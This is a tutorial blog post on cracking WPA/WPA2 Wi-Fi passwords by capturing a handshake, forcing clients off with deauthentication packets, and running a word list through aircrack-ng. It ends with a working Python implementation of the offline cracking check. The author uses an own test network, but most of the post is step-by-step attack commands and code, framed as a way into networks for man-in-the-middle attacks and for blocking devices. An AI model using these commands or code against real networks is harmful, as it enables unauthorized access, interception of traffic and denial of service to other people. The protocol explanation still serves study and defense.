Basic Wi-Fi WPA/WPA2 cracking (word list)

WiFi is in practically every home and office. Gaining access to an access point is useful if we want to attack a device connected to it: once we are on the same network we can, for example, perform Man in the Middle attacks. So it is good to know how to recover a WiFi password.

Nowadays WiFi is mostly secured with WPA/WPA2. There are a few ways to obtain the password, and the one I show here needs some luck: a word list attack. It tries every password we provide and checks whether it fits, but the check is done offline against a captured handshake rather than by connecting to the router, so it is much, much faster. We can use common word lists from the web or create our own. At the end of the day, though, the correct password has to be in the word list.

There is one more requirement: we must have a WiFi adapter that supports monitor mode.

I created a WiFi with SSID “HackMe”. 

As the screenshot shows, my WiFi adapter is called wlx00c0caaab23c,

and now we put the adapter into monitor mode, for example with the following commands:

airmon-ng check kill
airmon-ng start wlx00c0caaab23c

check kill stops NetworkManager and wpa_supplicant, which would otherwise keep resetting the card. Note that airmon-ng may rename the interface when it enables monitor mode (typically by appending mon); if it does, use the name it prints in the commands that follow.

In this mode we can listen to the packets transmitted in the air, hopping across all channels, by typing:

airodump-ng wlx00c0caaab23c

Our target, “HackMe”, has BSSID 3C:84:6A:74:9D:2C and is on channel 10, so we run airodump-ng again, this time with additional parameters that lock it to that BSSID and channel and write everything to a file:

airodump-ng --bssid 3C:84:6A:74:9D:2C --channel 10 --write hand_shake wlx00c0caaab23c

Now we must capture a handshake, which contains the data we are looking for. When a client joins a WPA2 network, the access point and the client perform a 4-way handshake: both sides derive the Pairwise Master Key (PMK) from the passphrase and the SSID, then derive a session key (PTK) from the PMK, two random nonces and both MAC addresses, and the client proves it knows the key by sending a MIC (a keyed hash) over the handshake message. The passphrase itself is never sent. Everything except the passphrase is visible in the captured frames, so a cracker can take a candidate password, repeat the derivation and check whether its MIC matches the one the client actually sent.

These messages are exchanged while a device connects to the WiFi, so we can simply wait for a new connection to occur. There is a much faster way, though: we can deauthenticate a connected client (-c is the client's MAC address, taken from the station list at the bottom of the airodump-ng output) and force it to reconnect with this command:

aireplay-ng --deauth 4 -a 3C:84:6A:74:9D:2C -c F4:96:34:34:EA:B8 wlx00c0caaab23c

Fun fact: if we keep spamming these deauth packets we can block devices from connecting to the WiFi at all (unless the network uses Protected Management Frames, 802.11w, which authenticates deauthentication frames). It can be useful sometimes.

As you can see, airodump-ng now shows “WPA handshake: 3C:84:6A:74:9D:2C” in its header line, so the handshake was captured. Now we need a word list; we can download one from the web or create one. To save time I generate one with crunch with most of the password already correct: the pattern below fixes “tajnehaslo” and lets each @ position take every character from the given digit set, so the file holds 1000 candidates.

crunch 13 13 1234567890 -o wordlist.txt -t tajnehaslo@@@

It’s almost done. Run a tool that checks every password until the correct one is found or the list runs out. I will use aircrack-ng, but you can also use, for example, hashcat, which runs on the GPU and is much faster than aircrack-ng on the CPU (hashcat needs the capture converted first, e.g. with hcxpcapngtool into its 22000 hash format).

aircrack-ng hand_shake-01.cap -w wordlist.txt

Finally, we cracked the password of the target WiFi. The output shows clearly that the password is “tajnehaslo123”.
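To make concrete what aircrack-ng does with the handshake and the word list, here is an added example (my own code, not part of the original post or of the aircrack-ng project) that implements the WPA2-PSK check itself: PBKDF2-SHA1 from passphrase and SSID to the PMK, PRF-512 to the PTK, and an HMAC-SHA1 MIC over the EAPOL-Key frame compared with the captured one. It also generates the same candidates as the crunch pattern above. Since no real capture is included, the handshake is constructed in the script from the page's SSID and MAC addresses with fixed nonces; the EAPOL frame layout follows 802.11, and the `Handshake` class and all function names are assumptions of this example.

```python
import hashlib
import hmac
import itertools
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class Handshake:
    """The pieces a cracker extracts from a captured WPA2 4-way handshake."""
    ssid: bytes
    ap_mac: bytes      # BSSID, 6 bytes
    sta_mac: bytes     # client MAC, 6 bytes
    anonce: bytes      # 32 bytes, sent by the AP in message 1
    snonce: bytes      # 32 bytes, sent by the client in message 2
    eapol: bytes       # EAPOL-Key message 2 with its MIC field zeroed
    mic: bytes         # the 16-byte MIC the client actually sent in message 2


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step and the reason GPU cracking beats CPU cracking."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def mic_for(pmk: bytes, hs: Handshake) -> bytes:
    """MIC over the EAPOL frame keyed with the first 16 bytes of the PTK (the KCK).
    Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    kck = ptk_from_pmk(pmk, hs)[:16]
    return hmac.new(kck, hs.eapol, hashlib.sha1).digest()[:16]


def crunch_like(prefix: str, digit_positions: int) -> Iterable[str]:
    """Same candidates as `crunch 13 13 1234567890 -t tajnehaslo@@@`: prefix + every digit combination."""
    for digits in itertools.product("0123456789", repeat=digit_positions):
        yield prefix + "".join(digits)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: PMK -> PTK -> MIC per candidate, compared with the captured MIC."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        if hmac.compare_digest(mic_for(pmk, hs), hs.mic):
            return candidate
    return None


def constructed_handshake(passphrase: str) -> Handshake:
    """Build a synthetic handshake for the page's 'HackMe' network (constructed data, not a real capture).
    Nonces are fixed bytes; EAPOL-Key message 2 is laid out per 802.11 with its MIC field zeroed."""
    ssid = b"HackMe"
    ap_mac = bytes.fromhex("3c846a749d2c")   # BSSID from the post
    sta_mac = bytes.fromhex("f4963434eab8")  # client MAC from the post
    anonce = bytes(range(32))
    snonce = bytes(range(100, 132))
    body = (b"\x02"                  # descriptor type: RSN key
            + b"\x01\x0a"            # key info: MIC set, pairwise, descriptor version 2 (HMAC-SHA1)
            + b"\x00\x00"            # key length (0 in message 2)
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce                 # key nonce
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # key ID (reserved)
            + b"\x00" * 16           # key MIC, zeroed before the MIC is computed
            + b"\x00\x00")           # key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key
    unsigned = Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, b"\x00" * 16)
    real_mic = mic_for(pmk_from_passphrase(passphrase, ssid), unsigned)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, real_mic)


if __name__ == "__main__":
    hs = constructed_handshake("tajnehaslo123")
    print("recovered:", crack(hs, crunch_like("tajnehaslo", 3)))
```

Two things the code makes visible: only the PMK step depends on the passphrase, and it depends on the SSID too, so precomputed tables are per-SSID; and the MIC check needs the EAPOL frame with its MIC field zeroed, which is why a clean message 2 (or 3) from the capture matters more than message 1 alone.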
